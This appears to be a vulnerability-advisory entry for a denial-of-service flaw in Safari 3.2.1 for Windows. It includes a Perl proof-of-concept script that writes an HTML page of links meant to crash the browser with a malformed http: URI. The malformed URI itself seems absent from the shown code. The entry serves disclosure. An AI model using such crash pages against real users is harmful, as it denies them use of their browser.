source: https://www.securityfocus.com/bid/33481/info Apple Safari is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Apple Safari 3.2.1 for Windows is vulnerable; other versions may also be affected. # !/usr/bin/perl # Safari_httpDoSPoc.pl # Safari for Windows 3.2.1 Remote http: uri handler DoS # Lostmon [Lostmon@gmail.com ] #[http://lostmon.blogspot.com] $archivo = $ARGV[0]; if(!defined($archivo)) { print "Uso: $0 \n"; } $cabecera = " Safari 3.2.1 for windows Browser Die PoC By Lostmon " . "\n"; $codigo = "

Safari 3.2.1 for windows Browser Die PoC By Lostmon
(lostmon@gmail.com) http://lostmon.blogspot.com

This PoC is a malformed http URI, this causes that safari for windows
turn inestable and unresponsive.
Click THIS link.=>

Safari Die() or this other =>Safari Die() "; $piepag = ""; $datos = $cabecera . $codigo . $piepag; open(FILE, '>' . $archivo); print FILE $datos; close(FILE); exit;